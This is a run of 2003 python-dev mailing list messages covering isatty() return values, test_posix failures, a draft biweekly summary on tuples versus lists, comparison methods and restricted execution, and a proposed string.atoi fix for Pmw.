> Return 1 if the file descriptor fd is open and connected to a tty(-like)
> device, else 0. Availability: Unix. "
>
> I don't see how to create a file() that is connected to stdout without
> importing sys...? Is there a way? If there is not, then file.isatty() is
> moot.

Sorry, I don't understand the question.

> So, really, what is the meaning of "64" as the return from
> sys.stdout.isatty()?

Before Python 2.3, it's simply the value Microsoft's isatty() function
returned.  Python 2.3 translates it to a bool.  Microsoft's docs say:

    _isatty returns a nonzero value handle is associated with a character
    device. Otherwise, _isatty returns 0.

The grammar errors are copied verbatim from their docs, BTW -- telling me
that didn't make sense won't help you <wink>.
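
Code that has to run on both old and new versions can simply normalize
the result itself.  A sketch, with is_console as a hypothetical helper
name; the only thing it relies on is that any nonzero return value
counts as true.

```python
import sys
import tempfile


def is_console(stream):
    """True if stream reports being attached to a terminal-like device."""
    isatty = getattr(stream, "isatty", None)
    if isatty is None:
        return False          # not a file-like object with isatty()
    return bool(isatty())     # 64, 1 and True all collapse to True


with tempfile.TemporaryFile() as scratch:
    print(is_console(scratch))   # a regular file is not a console
print(is_console(sys.stdout))    # depends on how the script is run
```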


From mstone@ugcs.caltech.edu  Mon Mar 17 22:25:56 2003
From: mstone@ugcs.caltech.edu (mstone@ugcs.caltech.edu)
Date: Mon, 17 Mar 2003 14:25:56 -0800 (PST)
Subject: [Python-Dev] test_posix failures?
Message-ID: <Pine.LNX.4.53.0303171419010.23138@lira.ugcs.caltech.edu>

> I think the test should be removed. I'm the one who added it, but
> there have been too many problems with it to make it useful.
> I will remove it later, unless someone beats me to it.
>
> Neal

In each case given the exception thrown is an OSError: [Errno 2] No
such file or directory, apparently due to inability to locate utmp.
The patch you already supplied at SF bug #697556 should fix any
of those.  Perhaps it's not necessary to scrap the test altogether?

(Now if anyone wants to look into the test_socket problem at 697556....)

-Michael


From thomas@xs4all.net  Mon Mar 17 22:42:33 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 17 Mar 2003 23:42:33 +0100
Subject: [Python-Dev] test_posix failures?
In-Reply-To: <Pine.LNX.4.53.0303171419010.23138@lira.ugcs.caltech.edu>
References: <Pine.LNX.4.53.0303171419010.23138@lira.ugcs.caltech.edu>
Message-ID: <20030317224233.GT2112@xs4all.nl>

On Mon, Mar 17, 2003 at 02:25:56PM -0800, mstone@ugcs.caltech.edu wrote:

> > I think the test should be removed. I'm the one who added it, but
> > there have been too many problems with it to make it useful.
> > I will remove it later, unless someone beats me to it.

> In each case given the exception thrown is an OSError: [Errno 2] No
> such file or directory, apparently due to inability to locate utmp.

No, the inability to locate the attached terminal in utmp (as I showed in my
example.) But this is not documented behaviour -- at least not on Linux,
BSDI and FreeBSD. I'm not able to reproduce the behaviour on the latter two,
but this may be because screen's "log-out" code isn't working properly. In
any case, we can't really rely on it only throwing OSError, but it's
probably 'good enough for our purposes'.

> (Now if anyone wants to look into the test_socket problem at 697556....)

A different bug report in the same bug report? Not surprising no one looked
at it ;)
-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From brett@python.org  Mon Mar 17 23:11:46 2003
From: brett@python.org (Brett Cannon)
Date: Mon, 17 Mar 2003 15:11:46 -0800 (PST)
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
Message-ID: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>

You guys have about 24 hours to point out how imperfect the summary is.

For those who participated in the `Capabilities` thread, please check my
summary.  I feel a little shaky about it and feel I could add more detail,
but I didn't want to add any wrong info so I kept it rather shallow.

------------------

python-dev Summary for 2003-03-01 through 2003-03-15
+++++++++++++++++++++++++++++++++++++++++++++++++++++

.. _last summary:

======================
Summary Announcements
======================

As I am sure most readers of this summary know by now, I am going to
PyCon_.  This means that I will be occupied the whole last week of this
month.  I suspect python-dev traffic will be light since I believe most of
PythonLabs will be at PyCon and thus not working.  =)  But still, I will
be occupied myself and thus won't have a chance to work on the summary
until I come home.  This means you should expect the next summary to be
rather late.  I will get to it, though, at some point.

And in case you haven't yet, register for PyCon_.

.. _PyCon: http://www.python.org/pycon/

=============================================
`Ridiculously minor tweaks?`__
=============================================
__ http://mail.python.org/pipermail/python-dev/2003-March/033962.html

Splinter threads:
    - `How long is your shopping tuple?
<http://mail.python.org/pipermail/python-dev/2003-March/033996.html>`__
    - `Tuples vs lists
<http://mail.python.org/pipermail/python-dev/2003-March/033981.html>`__
    - `Re: lists v. tuples
<http://mail.python.org/pipermail/python-dev/2003-March/034029.html>`__
    - `mutability
<http://mail.python.org/pipermail/python-dev/2003-March/034057.html>`__

The original point of this thread was Jeremy Fincher finding out if
patches changing lists to tuples where the list was not mutated would be
accepted for a minuscule performance boost (the answer was no).  But this
wasn't the interesting knowledge that came out of this thread.  This
thread led to Guido stating his intended uses of tuples and lists.

And you might be going, "lists are for mutable sequences of objects while
tuples are for immutable sequences of objects".  Well, that is not what
Guido thinks of lists and tuples (and don't feel bad if you thought
otherwise; Christian Tismer didn't even know what Guido had in mind and
Python does not exactly require you to agree with Guido on this).  Turns
out that tuples, in Guido's view of the world, are "for heterogeneous
data" and "list[s] are for homogeneous data"; "Tuples are *not* read-only
lists".

Guido spelled out his thinking on this in a later email.  He basically
said that he viewed lists as "a sequence of items of type X" while tuples
are more like "a sequence of length N with items of type X1, X2, X3, ..."
This makes sense since lists can be sorted while tuples can't; sorting on
different types doesn't necessarily result in a sequence sorted the way you
think about it.

And if you are still having trouble wrapping your head around this, just
view tuples as structs and lists as arrays, as in C.
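
A small illustration of that view, written in current Python syntax. The record layout (name, age) and the sample values are invented for the example.

```python
# A tuple as a fixed-length record: each position has its own meaning and type.
ada = ("Ada", 36)
grace = ("Grace", 45)
alan = ("Alan", 41)

# A list as a homogeneous sequence: every item is the same kind of record.
people = [ada, grace, alan]

# Sorting is meaningful because all items share one type and layout.
by_age = sorted(people, key=lambda record: record[1])
names = [name for name, _age in by_age]
print(names)  # ['Ada', 'Alan', 'Grace']
```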

This thread then led to another topic of comparisons_ in Python.  Guido
ended up mentioning how he wished == and != worked on all types (with
disparate types always being !=) while all of the other comparisons only
worked on similar types for the interpreter's default comparison
abilities.

This then led to Guido saying how he wished the __cmp__() magic method and
the cmp() built-in didn't exist.  This is because there are currently two
ways to do comparisons: __cmp__(), and then all of the other rich
comparison magic methods.  You can implement the same functionality as
__cmp__() using just __lt__() and __eq__().  There can also be an unneeded
performance penalty for __cmp__() since (using the previously mentioned
way of re-implementing __cmp__()) you might have to do some unneeded
comparisons when all you need is __eq__().
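
As a rough sketch of that re-implementation (current Python syntax; the Version class and the function name cmp_from_rich are made up for illustration), a three-way comparison can be assembled from == and < alone, assuming the values are totally ordered:

```python
def cmp_from_rich(a, b):
    """Three-way comparison built only from == and <."""
    if a == b:
        return 0
    return -1 if a < b else 1


class Version:
    """Hypothetical class that defines only the rich comparison methods."""

    def __init__(self, major, minor):
        self.key = (major, minor)

    def __eq__(self, other):
        return self.key == other.key

    def __lt__(self, other):
        return self.key < other.key


print(cmp_from_rich(Version(1, 0), Version(1, 2)))  # -1
print(cmp_from_rich(Version(2, 0), Version(2, 0)))  # 0
print(cmp_from_rich(Version(3, 1), Version(2, 9)))  # 1
```

The performance point follows from the shape of the function: a caller who only wants to know whether two values are equal is better served by a single __eq__() call than by a three-way result that may cost two comparisons.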

This discussion is still going on.

.. _comparisons:
http://www.python.org/dev/doc/devel/ref/customization.html#l2h-91


===========================
`Capabilities in Python`__
===========================
__ http://mail.python.org/pipermail/python-dev/2003-March/033820.html

Splinter threads:
    - `Capabilities
<http://mail.python.org/pipermail/python-dev/2003-March/033854.html>`__
    - `about candy
<http://mail.python.org/pipermail/python-dev/2003-March/033986.html>`__

This is a continuation of a discussion covered in the `last summary`_.

This was *definitely* the thread from hell for this summary.  =)  It is
very long and there was confusion at multiple points over terminology.
You have been warned.

Three things were constantly being discussed in this thread: restricted
execution, capabilities, and proxies.  We discuss them in this order.

Restricted execution basically cuts out access to certain objects at
execution time.  Currently, if you replace the global __builtins__ with
something other than what __builtin__.__dict__ has then you enable
restricted execution in Python.  This cuts off access to built-in objects
so as to prevent you from circumventing security code by, for instance,
importing the sys_ module so you can replace a module's code in
sys.modules.  Both capabilities and proxies are worthless without
restricted execution since they could be circumvented without it.
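
The name-lookup side of this can still be observed in current CPython, as the hedged sketch below shows. It is only an illustration of how a substituted __builtins__ changes what code can reach; it is not a sandbox, and it does not reproduce the restricted mode of the interpreters discussed in the thread. The helper name run_with_builtins is invented for the example.

```python
def run_with_builtins(source, builtins):
    """Execute source with the given dict standing in for __builtins__."""
    namespace = {"__builtins__": builtins}
    exec(source, namespace)
    return namespace


# With an empty builtins mapping the import statement cannot find __import__.
try:
    run_with_builtins("import sys", {})
    import_blocked = False
except ImportError:
    import_blocked = True

# Names that are explicitly handed over remain usable.
result = run_with_builtins("n = len('abc')", {"len": len})["n"]

print(import_blocked, result)
```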

Capabilities can loosely be thought of like bound methods.  Security with
capabilities is done based on possession; if you hold a reference to an
object you can use that object.

Proxies are a wrapper around objects that restrict access to the object.
This restriction extends all the way to the core; even core code can't get
access to parts of a proxied object that it doesn't want any object to get
a hold of.
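
A pure-Python approximation of the proxy idea might look like the sketch below. ReadOnlyProxy and Account are hypothetical names, and the wrapper is easy to bypass (the wrapped object is reachable as `_target`), so treat it as a picture of the interface rather than of the enforcement.

```python
class ReadOnlyProxy:
    """Hypothetical wrapper exposing only an allow-list of attributes."""

    def __init__(self, target, allowed):
        # Stored via object.__setattr__ to bypass our own __setattr__.
        object.__setattr__(self, "_target", target)
        object.__setattr__(self, "_allowed", frozenset(allowed))

    def __getattr__(self, name):
        # Called only for names not found on the proxy itself.
        if name in self._allowed:
            return getattr(self._target, name)
        raise AttributeError(name)

    def __setattr__(self, name, value):
        raise AttributeError("proxy is read-only")


class Account:
    def __init__(self, balance):
        self.balance = balance

    def withdraw(self, amount):
        self.balance -= amount


proxy = ReadOnlyProxy(Account(100), ["balance"])
print(proxy.balance)               # 100
print(hasattr(proxy, "withdraw"))  # False
```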

There was talk of a PEP on all of this but one has not appeared yet.

.. _sys: http://www.python.org/dev/doc/devel/lib/module-sys.html


=========
Quickies
=========

`Codec registry
<http://mail.python.org/pipermail/python-dev/2003-March/033805.html>`__
    Gustavo Niemeyer asked someone to review a patch.

`Changes to logging in CVS
<http://mail.python.org/pipermail/python-dev/2003-March/033811.html>`__
    Vinay Sajip asked if someone's checked-in changes to the logging_ package
could be rolled back since they broke compatibility with Python 1.5.2, which
the logging package tries to keep (as mentioned in `PEP 291`_).  The
changes were removed.

.. _logging: http://www.python.org/dev/doc/devel/lib/module-logging.html
.. _PEP 291: http://www.python.org/peps/pep-0291.html

`__slots__ for metatypes
<http://mail.python.org/pipermail/python-dev/2003-March/033815.html>`__
    Christian Tismer asked Guido and the list to take a look at a patch
that would allow meta-types to have a __slots__.  The patch was accepted
and applied.

`new bytecode results
<http://mail.python.org/pipermail/python-dev/2003-March/033817.html>`__
    Damien Morton continues on his quest to get performance boosts from
fiddling with the eval loop contained in `ceval.c`_ and trying out various
opcode ideas.  It was pointed out that pystone_ is a good indicator of how
Zope_ will perform on a new box.  It was also stated by Tim Peters that
since it is such an atypical test that it helps to make sure any
improvements you make *really* do make an improvement.  Damien also
requested more people contribute statistical information to Skip
Montanaro's stat server (more info at
http://manatee.mojam.com/~skip/python/ ).

.. ceval.c:
.. _pystone:
.. _Zope: http://www.zope.org/

`module extension search order - can it be changed?
<http://mail.python.org/pipermail/python-dev/2003-March/033826.html>`__
    This was discussed in the `last summary`_.  Tim Peters mentioned how
he doesn't use linecache_ often and that its printing out of date info is
of any great use for tracebacks.

.. _linecache:
http://www.python.org/dev/doc/devel/lib/module-linecache.html

`JUMP_IF_X opcodes
<http://mail.python.org/pipermail/python-dev/2003-March/033823.html>`__
    Damien Morton, still on the prowl for better opcodes, suggested
introducing opcodes that combined branching opcodes and POP_TOP (which
pops the top of the interpreter stack) and did the pop based on the truth
value of what was being tested.  Neal Norwitz suggested that instead the
branching instructions just always pop the stack.
    If all of this cool opcode stuff that Damien keeps doing interests
you, you will want to read `opcode.h`_, `ceval.c`_, and learn how to use
the dis_ module.
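
For a first look at branching opcodes, a sketch along these lines should work on a current CPython (it uses dis.get_instructions, which did not exist in the interpreters discussed here). The exact opcode names differ between versions, so no output is shown; pick() is just a throwaway function to disassemble.

```python
import dis


def pick(flag):
    if flag:
        return "yes"
    return "no"


# Collect the opcode names and keep the ones that perform a jump.
opnames = [instruction.opname for instruction in dis.get_instructions(pick)]
jump_ops = [name for name in opnames if "JUMP" in name]

print(jump_ops)
```

Calling dis.dis(pick) instead prints the full listing with offsets and arguments.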

.. _opcode.h:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Include/opcode.h
.. _ceval.c:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Python/ceval.c
.. _dis: http://www.python.org/dev/doc/devel/lib/module-dis.html

`Fun with timeit.py
<http://mail.python.org/pipermail/python-dev/2003-March/033826.html>`__
    A new module named timeit_ was added to the stdlib at the request of
Jim Fulton.  The module times the execution of code snippets.  Guido timed
the execution of going through a 'for' loop a million times with
interpreters from Python 1.3 up to the current CVS (2.3a2 with patches up
to that point).  The result was that CVS was the fastest.
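
A minimal sketch of timing a loop with the module, using its present-day function-level interface (timeit.timeit and timeit.repeat). The loop size and repeat counts are arbitrary choices for the example, and the numbers will vary by machine.

```python
import timeit

statement = "for i in range(1000): pass"

# Total time in seconds for 200 executions of the statement.
elapsed = timeit.timeit(stmt=statement, number=200)

# Repeating the measurement and taking the minimum reduces noise.
best = min(timeit.repeat(stmt=statement, number=200, repeat=3))

print("single run: %.6f s, best of three: %.6f s" % (elapsed, best))
```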

.. _timeit:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Lib/timeit.py

`Pre-PyCon sprint ideas
<http://mail.python.org/pipermail/python-dev/2003-March/033827.html>`__
    I asked the list to suggest ideas to sprint on at PyCon_.

`More Zen
<http://mail.python.org/pipermail/python-dev/2003-March/033828.html>`__
    Words of wisdom from Raymond Hettinger that everyone should read.  And
if you have never read Raymond's `School of Hard Knocks`_ email you owe
it to yourself to stop whatever you are doing and read it **now**.  I can
personally vouch that the email is right on the money; I have experienced (or
suffered, depending on your view =) every single thing on that list sans
writing a PEP (although writing the Summary is starting to be enough
writing to be equal =) .

.. _School of Hard Knocks:
http://mail.python.org/pipermail/python-dev/2002-September/028725.html

`xmlrpclib
<http://mail.python.org/pipermail/python-dev/2003-March/033837.html>`__ :
`xmlrpclib: Apology
<http://mail.python.org/pipermail/python-dev/2003-March/033847.html>`__
    Bill Bumgarner, the "hillbilly from the midwest of the US", asked if
the xmlrpclib_ module was being maintained.  The lesson was also learned
to not call Fredrik Lundh "Fred" on the list since Fred L. Drake, Jr.
tends to be associated with the name.  =)

.. _xmlrpclib:
http://www.python.org/dev/doc/devel/lib/module-xmlrpclib.html

`httplib SSLFile broken in CVS
<http://mail.python.org/pipermail/python-dev/2003-March/033832.html>`__
    Something got broken and fixed.

`super() bug (?)
<http://mail.python.org/pipermail/python-dev/2003-March/033846.html>`__
    Samuele Pedroni thought he may have found a bug with super() but
it turned out he hadn't.

`test_popen broken on Win2K
<http://mail.python.org/pipermail/python-dev/2003-March/033857.html>`__
    Win2k does not like quoting of commands when there is no space in the
command, as Tim Peters discovered.  There were discussions on how to deal
with this.  Coming up with an sh-like syntax that works on all platforms
(like what tcl's exec command has) was suggested.

`Change in int() behavior
<http://mail.python.org/pipermail/python-dev/2003-March/033863.html>`__
    David Abrahams rediscovered the joys of the road that leads to
int/long unification when he noticed that ``isinstance(int(sys.maxint*2),
int)`` returns False.  This will not be an issue once we are farther down
this road.
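
For comparison, here is the end of that road as it looks in Python 3, where the two types have been merged. sys.maxint no longer exists there, so the sketch assumes sys.maxsize as the nearest equivalent.

```python
import sys

big = sys.maxsize * 2  # larger than a native machine word

# There is only one integer type, so the isinstance check succeeds.
still_int = isinstance(big, int)

print(type(big).__name__, still_int)  # int True
```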

`acceptability of asm in python code?
<http://mail.python.org/pipermail/python-dev/2003-March/033868.html>`__
    Damien Morton popped his optimizing head back up on python-dev asking
if assembly code was acceptable in the core.  As of right now there is
none, but Tim Peters stated that if there was some that had "a huge
speedup, on all programs" then it would be considered, although "on the
weak end of maybe".  Christian Tismer (who plays with assembly in
Stackless_) warned against it in a large function since it can mess up
caching.

.. _Stackless: http://www.stackless.com/

`Internationalizing domain names
<http://mail.python.org/pipermail/python-dev/2003-March/033869.html>`__
    Martin v. Löwis asked someone to look over his patches to implement
IDNA (Internationalizing Domain Names in Applications), which allows
non-ASCII characters in domain names.

`VERSION in getpath.c
<http://mail.python.org/pipermail/python-dev/2003-March/033882.html>`__
    Guido explains to someone what compile variables are used to generate
some compile-based search paths.

`Where is OSS used?
<http://mail.python.org/pipermail/python-dev/2003-March/033905.html>`__
    Greg Ward asked what OSs use OSS_.

.. _OSS: http://www.opensound.com/

`Audio devices
<http://mail.python.org/pipermail/python-dev/2003-March/033947.html>`__
    Greg Ward asked for opinions on some API issues for ossaudiodev_.

.. _ossaudiodev:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Modules/ossaudiodev.c

`bsddb3 test errors - are these expected?
<http://mail.python.org/pipermail/python-dev/2003-March/033961.html>`__
    Skip Montanaro asked if some errors from the testing of bsddb3_ on OS
X were expected.

.. _bsddb3:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Modules/_bsddb.c

`os.path.dirname misleading?
<http://mail.python.org/pipermail/python-dev/2003-March/033980.html>`__
    Kevin Altis was surprised to discover that `os.path.dirname`_ would
return the tail end of a directory instead of an empty string when the
argument to the function was just a directory name.
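
The function splits purely on the last separator and never checks the filesystem, which a few sample calls make visible. This sketch uses posixpath so the results do not depend on the platform; the paths are arbitrary examples, and which exact call surprised Kevin is not stated in this summary.

```python
import posixpath

examples = ["/usr/local/lib", "/usr/local/lib/", "lib"]
results = {path: posixpath.dirname(path) for path in examples}

for path, parent in results.items():
    print(repr(path), "->", repr(parent))
# '/usr/local/lib' -> '/usr/local'
# '/usr/local/lib/' -> '/usr/local/lib'
# 'lib' -> ''
```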

.. _os.path.dirname:
http://www.python.org/dev/doc/devel/lib/module-os.path.html#l2h-1443

`Care to sprint on the core at PyCon?
<http://mail.python.org/pipermail/python-dev/2003-March/033999.html>`__
    Me asking the world if they wanted to sprint on the core at the
pre-PyCon sprint (if you do, read the email for details).

`Iterable sockets?
<http://mail.python.org/pipermail/python-dev/2003-March/034038.html>`__
    Andrew McNamara wished that socket objects were iterable on a per-line
basis without having to call makefile().  Guido said he would rather come
up with a better abstraction for Python 3 and prototype it in Python 2.4
or later.
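
The makefile() route that Andrew wanted to avoid looks roughly like this in current Python. The sketch uses socket.socketpair() so that it is self-contained; the two messages are made up.

```python
import socket

sender, receiver = socket.socketpair()
with sender, receiver:
    sender.sendall(b"first\nsecond\n")
    sender.shutdown(socket.SHUT_WR)  # signal end of data to the reader

    # Wrapping the socket in a file object gives per-line iteration.
    with receiver.makefile("r", encoding="ascii") as reader:
        lines = [line.rstrip("\n") for line in reader]

print(lines)  # ['first', 'second']
```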

`More int/long integration issues
<http://mail.python.org/pipermail/python-dev/2003-March/034019.html>`__
    David Abrahams noticed that range() and xrange() couldn't accept a
long.  It basically led to Guido stating he hates xrange() and wishes it
didn't exist.  But since getting rid of it would break code he can at
least prevent it from gaining abilities.  It also led to Guido mentioning
again how he would like to prohibit shadowing of built-ins.

`tzset
<http://mail.python.org/pipermail/python-dev/2003-March/034062.html>`__
    A new function, time.tzset(), was added to Python and the tests had
failed under Windows.  The tests and the ./configure check were changed as
needed.

`PyObject_New vs PyObject_NEW
<http://mail.python.org/pipermail/python-dev/2003-March/033970.html>`__
    Lesson of the thread: PyObject_NEW is only to be used in the core; use
`PyObject_New()`_ for extension modules.

.. _PyObject_New():
http://www.python.org/dev/doc/devel/api/allocating-objects.html

`are NULL checks in Objects/abstract.c really needed?
<http://mail.python.org/pipermail/python-dev/2003-March/034011.html>`__
    ... They are not required, but they are there to protect you against
poorly written extensions.  Skip Montanaro subsequently suggested a
--without-null-checks compile option.

`PyEval_GetFrame() revisited
<http://mail.python.org/pipermail/python-dev/2003-March/034052.html>`__
    A possible API for manipulating the current frame was still being
discussed.


From ark@research.att.com  Mon Mar 17 23:34:02 2003
From: ark@research.att.com (Andrew Koenig)
Date: Mon, 17 Mar 2003 18:34:02 -0500 (EST)
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303162034.h2GKYH415958@pcp02138704pcs.reston01.va.comcast.net>
 (message from Guido van Rossum on Sun, 16 Mar 2003 15:34:17 -0500)
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it>
 <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>
 <b4vp23$vec$1@main.gmane.org>
 <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
 <yu99adfw5h5n.fsf@europa.research.att.com>
 <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net>
 <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net>
 <200303161602.h2GG2DO00056@europa.research.att.com> <200303162034.h2GKYH415958@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303172334.h2HNY2j13488@europa.research.att.com>

Guido> This seems an argument for keeping both __cmp__ and the six __lt__
Guido> etc.  Yet TOOWTDI makes me want to get rid of __cmp__.

I'm beginning to wonder if part of what's going on is that there are
really two different concepts that go under the general label of
"comparison", namely the cases where trichotomy does and does not apply.

In the first case, we have a total ordering; in the second, we have what
C++ calls a "strict weak ordering", which is really an ordering of
equivalence classes.
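
One way to see the difference, as a sketch in current Python: under a case-insensitive "less than", two distinct strings can be equivalent (neither orders before the other) without being equal, which is what an ordering of equivalence classes means. The helper names less_ci and equivalent are invented for the example.

```python
import operator


def less_ci(a, b):
    """Case-insensitive 'less than': a strict weak ordering on strings."""
    return a.lower() < b.lower()


def equivalent(a, b, less):
    # Two items are equivalent when neither orders before the other.
    return not less(a, b) and not less(b, a)


a, b = "Apple", "apple"

# Strict weak ordering: equivalent, yet not equal.
print(equivalent(a, b, less_ci), a == b)      # True False

# Total ordering with plain <: trichotomy holds, so unequal means ordered.
print(equivalent(a, b, operator.lt))          # False
```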


From greg@cosc.canterbury.ac.nz  Tue Mar 18 00:03:19 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 18 Mar 2003 12:03:19 +1200 (NZST)
Subject: [Python-Dev] PyObject_GenericGetIter()
In-Reply-To: <20030317151040.GQ2112@xs4all.nl>
Message-ID: <200303180003.h2I03JJ25264@oma.cosc.canterbury.ac.nz>

Thomas Wouters <thomas@xs4all.net>:

> it's a generic way to return an iterator *for an
> iterator*. PyIter_GenericGetIter, PyObject_IterGetIter, etc are all
> more descriptive.

It should have Generic in it somewhere to fit the pattern.
I'd go for PyIter_GenericGetIter.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From guido@python.org  Tue Mar 18 01:34:01 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 17 Mar 2003 20:34:01 -0500
Subject: [Python-Dev] PyObject_GenericGetIter()
In-Reply-To: "Your message of Tue, 18 Mar 2003 12:03:19 +1200."
 <200303180003.h2I03JJ25264@oma.cosc.canterbury.ac.nz>
References: <200303180003.h2I03JJ25264@oma.cosc.canterbury.ac.nz>
Message-ID: <200303180134.h2I1Y1X19684@pcp02138704pcs.reston01.va.comcast.net>

> It should have Generic in it somewhere to fit the pattern.

Why?  It's *not* generic.  It's *specific* (to iterators).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From python@rcn.com  Tue Mar 18 01:36:04 2003
From: python@rcn.com (Raymond Hettinger)
Date: Mon, 17 Mar 2003 20:36:04 -0500
Subject: [Python-Dev] Shortcut bugfix
Message-ID: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>

There is an SF report that Pmw gets TypeErrors under Py2.3
but not under previous versions of Python:  www.python.org/sf/697591

There are three parts to the story:
1.   a method in _tkinter.c was changed (probably appropriately) to 
      occasionally return ints in addition to strings.

2.   Pmw used string.atoi() to coerce the result to an int.
      This should probably be changed, but I don't want
      existing Pmw to suddenly fail under 2.3.

3.   string.atoi(s)  works by calling int(s,10).  It is the
      ten part that makes int() raise a TypeError.

The long way to fix this bug is to 1) have Neal or MvL research the 
propriety of the changes to _tkinter and possibly find that they needed to
be done and have to be left alone and 2) have the Pmw folks
update their code to not use string.atoi(s) when s is not a string
(seems like a bug, but s used to always be a string when they
wrote the code).  Step 2 doesn't help existing users of Pmw
unless they get a bugfix release.

The shortcut is to fix something that isn't broken and have string.atoi
stop automatically appending the ten to the int() call.

Current string.atoi:
    def atoi(s, base=10):
        return _int(s, base)

Proposed string.atoi:
    def atoi(s, *args):
        return _int(s, *args)

The shortcut has some appeal because it lets the improvements
to _tkinter stay in place and allows existing Pmw installations
to continue to operate.  Otherwise, one of the two has to change.
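
The mechanism can be reproduced outside the string module. The sketch below re-creates both bodies under the names atoi_current and atoi_proposed (invented here) and runs them on Python 3, where string.atoi itself no longer exists; the outcome() helper is also just for the demonstration.

```python
_int = int  # stand-in for the alias to the builtin used in the snippets above


def atoi_current(s, base=10):
    return _int(s, base)


def atoi_proposed(s, *args):
    return _int(s, *args)


def outcome(func, *args):
    """Return the result, or the name of the exception raised."""
    try:
        return func(*args)
    except (TypeError, ValueError) as exc:
        return type(exc).__name__


print(outcome(atoi_current, "42"))        # 42
print(outcome(atoi_current, 42))          # TypeError
print(outcome(atoi_proposed, 42))         # 42
print(outcome(atoi_proposed, "ff", 16))   # 255
```

An explicit base is only accepted together with a string argument, which is why passing the default 10 along turns an int argument into an error.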

Does anyone think changing string.atoi is the wrong way to go?


Raymond Hettinger


From greg@cosc.canterbury.ac.nz  Tue Mar 18 01:41:18 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 18 Mar 2003 13:41:18 +1200 (NZST)
Subject: [Python-Dev] PyObject_GenericGetIter()
In-Reply-To: <200303180134.h2I1Y1X19684@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303180141.h2I1fIq27804@oma.cosc.canterbury.ac.nz>

> Why?  It's *not* generic.  It's *specific* (to iterators).

That's why I voted for PyIter_GenericGetIter and not
PyObject_GenericGetIter.

PyIter_ means it has to do with iterators; Generic means
it's a default implementation; GetIter identifies which
type slot it implements.
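
At the Python level, the behaviour being named is simply an __iter__ that returns the object itself. The sketch below is a Python analogue only, not the C function under discussion; Countdown is a made-up class.

```python
class Countdown:
    """An iterator: it implements both __iter__ and __next__."""

    def __init__(self, start):
        self.current = start

    def __iter__(self):
        # The entire job of the "get iterator" slot for an iterator.
        return self

    def __next__(self):
        if self.current <= 0:
            raise StopIteration
        self.current -= 1
        return self.current + 1


counter = Countdown(3)
same_object = iter(counter) is counter
values = list(counter)
print(same_object, values)  # True [3, 2, 1]
```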

Hmmm... maybe we need a formal grammar for Python/C API
function names, to help settle questions like this...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Tue Mar 18 01:47:24 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 18 Mar 2003 13:47:24 +1200 (NZST)
Subject: [Python-Dev] Shortcut bugfix
In-Reply-To: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>
Message-ID: <200303180147.h2I1lOs27924@oma.cosc.canterbury.ac.nz>

Raymond Hettinger <raymond.hettinger@verizon.net>:

> Current string.atoi:
>     def atoi(s, base=10):
>         return _int(s, base)
> 
> Proposed string.atoi:
>     def atoi(s, *args):
>         return _int(s, *args)

It looks harmless to me. My only concern would be if it
started making things like string.atoi("0x10") accepted,
but a quick experiment suggests that this would not be
the case (in 2.2, at least).

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From martin@v.loewis.de  Tue Mar 18 06:58:03 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 18 Mar 2003 07:58:03 +0100
Subject: [Python-Dev] Shortcut bugfix
In-Reply-To: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>
References: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>
Message-ID: <m3znntnouc.fsf@mira.informatik.hu-berlin.de>

"Raymond Hettinger" <raymond.hettinger@verizon.net> writes:

> There are three parts to the story:
> 1.   a method in _tkinter.c was changed (probably appropriately) to 
>       occasionally return ints in addition to strings.
> 
> 2.   Pmw used string.atoi() to coerce the result to an int.
>       This should probably be changed, but I don't want
>       existing Pmw to suddenly fail under 2.3.

Is Pmw using _tkinter directly, or indirectly via Tkinter?

Neither answer to this question makes sense:
a) if Pmw uses _tkinter directly, it should not receive int results.
b) if Pmw uses Tkinter, it should not find methods that used to
   return strings but now return ints.

If, for some strange reason, b) does happen, applications can invoke
Tkinter.wantobjects = 0
to restore the old behaviour.

> Does anyone think changing string.atoi is the wrong way to go?

It would change the historical behaviour, I believe:
string.atoi(10) used to give a TypeError even back in Python 1.5.

Regards,
Martin


